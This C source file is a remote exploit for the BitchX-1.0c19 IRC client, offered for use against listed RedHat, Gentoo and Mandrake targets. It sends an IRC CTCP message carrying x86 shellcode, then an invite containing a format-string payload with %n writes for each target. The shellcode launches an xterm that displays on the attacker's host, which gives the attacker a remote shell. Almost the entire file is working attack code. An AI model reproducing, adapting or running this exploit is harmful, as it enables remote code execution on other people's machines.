/* bitchupx.c - BitchX-1.0c19 recieve remote exploit * x-ekz 10/8/02 * * Remote vulnerability in popular Irc client. * This vulnerability has exsisted for a while, * there are duplicate codes floating around , I * thought i'd give it a try also. keep it private * * * vulnerable: * RedHat Linux 7.3 * RedHat Linux 7.2 * RedHat Linux 7.0 * Mandrake Linux 8.2 * Gentoo Linux * * not vulnerable: * RedHat Linux 8.0 * Slackware (all) * * * * * !!KEEP PRIVATE -PRIVATE DO NOT DISTRIBUTE - KEEP PRIVATE!! * * * shoutouts!:abbyload / Tsao / #chinkz */ #include #include #include #include #include #include #include #include #include #define PORT 6667 int soc_local,snick; struct sockaddr_in addr_local; struct hostent *server; char buf[1024], cmd[512], formatbuf[1024], ip[64], *p; int irc(char *n,char *s,char *sc); int format(int v); static char shellcode[256] = "\xeb\x5b\x5e\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xc3\x75\x47\x31" "\xd2\x88\x56\x14\x88\x56\x18\x88\x56\x21\xb2\x2b\x31\xc9\xb1\x09" "\x80\x3c\x32\x4b\x74\x05\x42\xe2\xf7\xeb\x2b\x88\x34\x32\x31\xd2" "\x89\xf3\x89\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d\x7e\x19\x89\x7e" "\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e\x36\x8d\x56\x46" "\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xa0\xff" "\xff\xff/usr/X11R6/bin/xterm8-ut8-display8"; char nops4[] = "\x90\x90\x90\x90"; // main() int main(int argc, char *argv[]) { if (argc!=5) { printf("\n********************************************\n"); printf("\n!BitchX-1.0c19 remote recieve exploit by x-ekz\n"); printf("\n"); printf("\nuseage: %s [user] [irc_server] [localhost] [target]\n",argv[0]); printf("\nex: %s test123 irc.prison.net 127.0.0.1 1\n",argv[0]); printf("\ntarget:1[*] RedHat 7.3 (rpm)\n" "target:2[*] RedHat 7.2\n" "target:3[*] RedHat 7.0\n" "target:4[*] Gentoo linux\n" "target:5[*] Debian (test)\n" "target:5[*] Mandrake 8.3\n\n"); exit(0); } sprintf(ip,"%s:0K",argv[3]); strcat(shellcode,ip); puts("\nattempting to spawn shell...."); snick=strlen(argv[1]); format(atoi(argv[4])); irc (argv[1],argv[2],formatbuf); printf("done!@\n\n"); return(0); } // end main() // irc() int irc(char *n,char *s,char *sc) { if ((server = gethostbyname(s)) == 0) { printf("connection can not be established..\n"); exit(0); } if ((soc_local=socket(AF_INET,SOCK_STREAM,0)) == -1) { printf("socket error\n"); exit(0); } bzero((char *) &addr_local, sizeof(addr_local)); addr_local.sin_family = AF_INET; addr_local.sin_port = htons(PORT); memcpy(&addr_local.sin_addr, server->h_addr, server->h_length); if ((connect(soc_local,(struct sockaddr *) &addr_local,sizeof(addr_local))) == -1) { printf("server error..\n"); exit(0); } p=buf; // user sprintf(cmd,"user k k k k\n"); write(soc_local,cmd,strlen(cmd)); // nick sprintf(cmd,"nick rxkfe\n"); write(soc_local,cmd,strlen(cmd)); // pong while(1) { read(soc_local,p,1); if ((*p=='\n') && (strstr(buf,"PING :"))) { p = (strstr(buf,"PING :")) + strlen("PING :"); sprintf(cmd,"PONG %s",p); write(soc_local,cmd,strlen(cmd)); break; } if (*p=='\n') p=buf; p++; } // ctcp sprintf(cmd,"privmsg %s :\x01%s%s%s%s%s%s\x01\n" ,n,nops4,nops4,nops4,nops4,nops4,shellcode); write(soc_local,cmd,strlen(cmd)); sleep(2); // invite sprintf(cmd,"invite %s #%s\n",n,sc); write(soc_local,cmd,strlen(cmd)); sleep(2); return(0); } // end irc() // format() int format(int v) { if ((v!=1) && (v!=2) && (v!=3) && (v!=4) && (v!=5) && (v!=6)) { printf("\nTarget 1:[*] RedHat 7.3\n" "Target 2:[*] RedHat 7.2\n" "Target 3:[*] RedHat 7.0\n" "Target 4:[*] Gentoo linux\n" "Target 5:[*] Debian (test)\n" "Target 6:[*] Mandrake 8.3\n\n"); printf("Goodbye!....\n\n"); exit(0); } if (v==1) { int n, nr, a1, nx, nn = 0x150; char dire[4][8] = { "\x60","\x61","\x62","\x63" }; int a2 = 0x1f4 - 0xdb; int a3 = 0xff - 0xb5; int a4 = 0x1bf - 0xff; char xx[1024], nops[256]; switch(snick) { case 1: sprintf(nops,"\x90%s",nops4); nx = 126; nr = 0x6; break; case 2: sprintf(nops,"%s",nops4); nx = 126; nr = 0x5; break; case 3: sprintf(nops,"\x90\x90\x90"); nx = 126; nr = 0x4; break; case 4: sprintf(nops,"\x90\x90"); nx = 126; nr = 0x3; break; case 5: sprintf(nops,"\x90"); nx = 126; nr = 0x2; break; case 6: sprintf(nops,"%s",nops4); nx = 129; nr = 0x5; nn = 0x158; break; case 7: sprintf(nops,"\x90\x90\x90"); nx = 129; nr = 0x4; nn = 0x158; break; case 8: sprintf(nops,"\x90\x90"); nx = 129; nr = 0x3; nn = 0x158; break; case 9: sprintf(nops,"\x90"); nx = 129; nr = 0x2; nn = 0x158; } a1 = 0x10db - nn - 0x10 - 0xc - nr; for (n = 0; n < nx ; n += 3) strcpy(&xx[n], "%8x"); sprintf(formatbuf, "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" ,nops,dire[0],nops4,dire[1],nops4,dire[2], nops4,dire[3],xx,a1,a2,a3,a4); } if (v==2) { int n, nr, a1, nx, nn = 0x150; char dire[4][8] = { "\x60","\x61","\x62","\x63" }; int a2 = 0x1b5 - 0xdb; int a3 = 0xff - 0xb5; int a4 = 0x1bf - 0xff; char xx[1024], nops[256]; switch(snick) { case 1: sprintf(nops,"\x90%s",nops4); nx = 126; nr = 0x6; break; case 2: sprintf(nops,"%s",nops4); nx = 126; nr = 0x5; break; case 3: sprintf(nops,"\x90\x90\x90"); nx = 126; nr = 0x4; break; case 4: sprintf(nops,"\x90\x90"); nx = 126; nr = 0x3; break; case 5: sprintf(nops,"\x90"); nx = 126; nr = 0x2; break; case 6: sprintf(nops,"%s",nops4); nx = 129; nr = 0x5; nn = 0x158; break; case 7: sprintf(nops,"\x90\x90\x90"); nx = 129; nr = 0x4; nn = 0x158; break; case 8: sprintf(nops,"\x90\x90"); nx = 129; nr = 0x3; nn = 0x158; break; case 9: sprintf(nops,"\x90"); nx = 129; nr = 0x2; nn = 0x158; } a1 = 0x10db - nn - 0x10 - 0xc - nr; for (n = 0; n < nx ; n += 3) strcpy(&xx[n], "%8x"); sprintf(formatbuf, "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" ,nops,dire[0],nops4,dire[1],nops4,dire[2], nops4,dire[3],xx,a1,a2,a3,a4); } if (v==3) { int n, nr, a1, nx, nn = 0x150; char dire[4][8] = { "\x60","\x61","\x62","\x63" }; int a2 = 0x1b5 - 0xdb; int a3 = 0xff - 0xb5; int a4 = 0x1bf - 0xff; char xx[1024], nops[256]; switch(snick) { case 1: sprintf(nops,"\x90%s",nops4); nx = 126; nr = 0x6; break; case 2: sprintf(nops,"%s",nops4); nx = 126; nr = 0x5; break; case 3: sprintf(nops,"\x90\x90\x90"); nx = 126; nr = 0x4; break; case 4: sprintf(nops,"\x90\x90"); nx = 126; nr = 0x3; break; case 5: sprintf(nops,"\x90"); nx = 126; nr = 0x2; break; case 6: sprintf(nops,"%s",nops4); nx = 129; nr = 0x5; nn = 0x158; break; case 7: sprintf(nops,"\x90\x90\x90"); nx = 129; nr = 0x4; nn = 0x158; break; case 8: sprintf(nops,"\x90\x90"); nx = 129; nr = 0x3; nn = 0x158; break; case 9: sprintf(nops,"\x90"); nx = 129; nr = 0x2; nn = 0x158; } a1 = 0x10db - nn - 0x10 - 0xc - nr; for (n = 0; n < nx ; n += 3) strcpy(&xx[n], "%8x"); sprintf(formatbuf, "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" ,nops,dire[0],nops4,dire[1],nops4,dire[2], nops4,dire[3],xx,a1,a2,a3,a4); } if (v==4) { int n, nr, a1, nx, nn = 0x138; char dire[4][8] = { "\xbc","\xbd","\xbe","\xbf" }; int a2 = 0x1b2 - 0xc1; int a3 = 0xff - 0xb2; int a4 = 0x1bf - 0xff; char xx[1024], nops[256]; switch(snick) { case 1: sprintf(nops,"\x90%s",nops4); nx = 117; nr = 0x6; strcpy(dire[0],"\xbc"); strcpy(dire[1],"\xbd"); strcpy(dire[2],"\xbe"); strcpy(dire[3],"\xbf"); break; case 2: sprintf(nops,"%s",nops4); nx = 117; nr = 0x5; strcpy(dire[0],"\xbc"); strcpy(dire[1],"\xbd"); strcpy(dire[2],"\xbe"); strcpy(dire[3],"\xbf"); break; case 3: sprintf(nops,"\x90\x90\x90"); nx = 117; nr = 0x4; strcpy(dire[0],"\xbc"); strcpy(dire[1],"\xbd"); strcpy(dire[2],"\xbe"); strcpy(dire[3],"\xbf"); break; case 4: sprintf(nops,"\x90\x90"); nx = 117; nr = 0x3; strcpy(dire[0],"\xbc"); strcpy(dire[1],"\xbd"); strcpy(dire[2],"\xbe"); strcpy(dire[3],"\xbf"); break; case 5: sprintf(nops,"\x90"); nx = 117; nr = 0x2; break; case 6: sprintf(nops,"%s",nops4); nx = 120; nr = 0x5; nn = 0x140; break; case 7: sprintf(nops,"\x90\x90\x90"); nx = 120; nr = 0x4; nn = 0x140; break; case 8: sprintf(nops,"\x90\x90"); nx = 120; nr = 0x3; nn = 0x140; break; case 9: sprintf(nops,"\x90"); nx = 120; nr = 0x2; nn = 0x140; } a1 = 0x10c1 - nn - 0x10 - 0xc - nr; for (n = 0; n < nx ; n += 3) strcpy(&xx[n], "%8x"); sprintf(formatbuf, "%s" "%s\xe7\xff\xbf" "%s" "%s\xe7\xff\xbf" "%s" "%s\xe7\xff\xbf" "%s" "%s\xe7\xff\xbf" "%s" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" ,nops,dire[0],nops4,dire[1],nops4,dire[2], nops4,dire[3],xx,a1,a2,a3,a4); } if (v==5) { int n, nr, a1, nx, nn = 0x150; char dire[4][8] = { "\x60","\x61","\x62","\x63" }; int a2 = 0x1b5 - 0xdb; int a3 = 0xff - 0xb5; int a4 = 0x1bf - 0xff; char xx[1024], nops[256]; switch(snick) { case 1: sprintf(nops,"\x90%s",nops4); nx = 126; nr = 0x6; break; case 2: sprintf(nops,"%s",nops4); nx = 126; nr = 0x5; break; case 3: sprintf(nops,"\x90\x90\x90"); nx = 126; nr = 0x4; break; case 4: sprintf(nops,"\x90\x90"); nx = 126; nr = 0x3; break; case 5: sprintf(nops,"\x90"); nx = 126; nr = 0x2; break; case 6: sprintf(nops,"%s",nops4); nx = 129; nr = 0x5; nn = 0x158; break; case 7: sprintf(nops,"\x90\x90\x90"); nx = 129; nr = 0x4; nn = 0x158; break; case 8: sprintf(nops,"\x90\x90"); nx = 129; nr = 0x3; nn = 0x158; break; case 9: sprintf(nops,"\x90"); nx = 129; nr = 0x2; nn = 0x158; } a1 = 0x10db - nn - 0x10 - 0xc - nr; for (n = 0; n < nx ; n += 3) strcpy(&xx[n], "%8x"); sprintf(formatbuf, "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%s\xea\xff\xbf" "%s" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" ,nops,dire[0],nops4,dire[1],nops4,dire[2], nops4,dire[3],xx,a1,a2,a3,a4); } if (v==6) { int n, nr, a1, nx, nn = 0x180; char dire[4][8] = { "\x80","\x81","\x82","\x83" }; int a2 = 0x1b3 - 0xa4; int a3 = 0xff - 0xb3; int a4 = 0x1bf - 0xff; char xx[1024], nops[256]; switch(snick) { case 1: sprintf(nops,"\x90%s",nops4); nx = 144; nr = 0x6; break; case 2: sprintf(nops,"%s",nops4); nx = 144; nr = 0x5; break; case 3: sprintf(nops,"\x90\x90\x90"); nx = 144; nr = 0x4; break; case 4: sprintf(nops,"\x90\x90"); nx = 144; nr = 0x3; break; case 5: sprintf(nops,"\x90"); nx = 144; nr = 0x2; break; case 6: sprintf(nops,"%s",nops4); nx = 147; nr = 0x5; nn = 0x188; break; case 7: sprintf(nops,"\x90\x90\x90"); nx = 147; nr = 0x4; nn = 0x188; break; case 8: sprintf(nops,"\x90\x90"); nx = 147; nr = 0x3; nn = 0x188; break; case 9: sprintf(nops,"\x90"); nx = 147; nr = 0x2; nn = 0x188; strcpy(dire[0],"\x70"); strcpy(dire[1],"\x71"); strcpy(dire[2],"\x72"); strcpy(dire[3],"\x73"); } a1 = 0x10a4 - nn - 0x10 - 0xc - nr; for (n = 0; n < nx ; n += 3) strcpy(&xx[n], "%8x"); sprintf(formatbuf, "%s" "%s\xe8\xff\xbf" "%s" "%s\xe8\xff\xbf" "%s" "%s\xe8\xff\xbf" "%s" "%s\xe8\xff\xbf" "%s" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" "%%%dx%%n" ,nops,dire[0],nops4,dire[1],nops4,dire[2], nops4,dire[3],xx,a1,a2,a3,a4); } return(0); } // end format() // 0x00